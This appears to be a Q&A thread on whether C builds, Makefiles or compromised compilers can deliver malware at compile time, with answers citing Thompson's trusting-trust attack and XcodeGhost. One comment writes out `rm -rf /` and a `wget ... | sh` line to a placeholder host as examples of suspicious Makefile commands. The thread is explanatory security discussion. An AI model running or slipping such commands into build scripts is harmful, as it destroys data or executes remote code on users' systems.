# Compile time malware possible?

Tags: c, compilation, malware

Is it possible for let's say open source programs to install malware at compile time? I'm thinking of C macros or makefile related stuff that will execute evil code at compile time. Or am I safe as long as I don't start running the compiled program?

Comment: Technically a make file could run any command it has permissions to when building a target, but it would be a bizarre and pointless way to deliver malware, considering anyone can open the Makefile to see what it's doing.

Comment: C macros can't modify anything.

Comment: @Linuxios How is it any more pointless than distributing malware in source form in the first place, since anyone can open the source code to see what it's doing?

Comment: @Barmar: Because at least in source code you have to find it in possibly thousands of lines of code, and what something does might not be obvious. Makefiles are short, and have to use only installed commands and programs, which if you've already installed malware, whats the point, and if you haven't, it's pretty obvious that `rm -rf /` or `wget some.weird.address | sh` (that's not a real command, but whatever) does't belong in a makefile.

Comment: @Linuxios: http://scienceblogs.com/goodmath/2007/04/15/strange-loops-dennis-ritchie-a/

Comment: @MooingDuck: Huh. Interesting! Thanks.

Comment: @Linuxios I've seen some pretty elaborate makefiles, like the ones created by X11. And if I were trying to distribute malware that way, I might include a thousand-line makefile, most of which is not used, to obfuscate what I'm doing.

Comment: The compiler itself can be malware.  Open source code does not compile, the compiler does.  Some earlier cc code had its back-doors that it replicated when it compiled code to make a new compiler.

Answer (score 2, accepted):

Consider that the makefile is essentially just a list of commands to run. So take for example the idea that you could distribute malware source code in a makefile project. Then when you build the project, the makefile goes and compiles the malware... and then at the end, executes the newly-compiled malware -- say for example pretending to run a unit test on what you think is not malware.

It's certainly possible.

Answer (score 6):

Not only is it possible for configure or make scripts to *install* malicious code at compile time, but the compiler or build tools could be modified to inject a backdoor or other malicious code into the compiled binaries.  That is, even though the code you're building appears clean, the build tools could 'go rogue' and introduce malicious code.

This concept of malicious compilers was famously presented by a paper titled 'Reflections on Trusting Trust'[1].  Recently, malware was discovered in iOS apps that was injected using this technique by attacking developers' compilers (Xcode) [2].

**bottom line:** Unless you've written or reviewed every line of code from the project you're building, the tools your using to build it, and the OS/firmware you're building it on, you can't fully trust it.

[1] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf

[2] http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/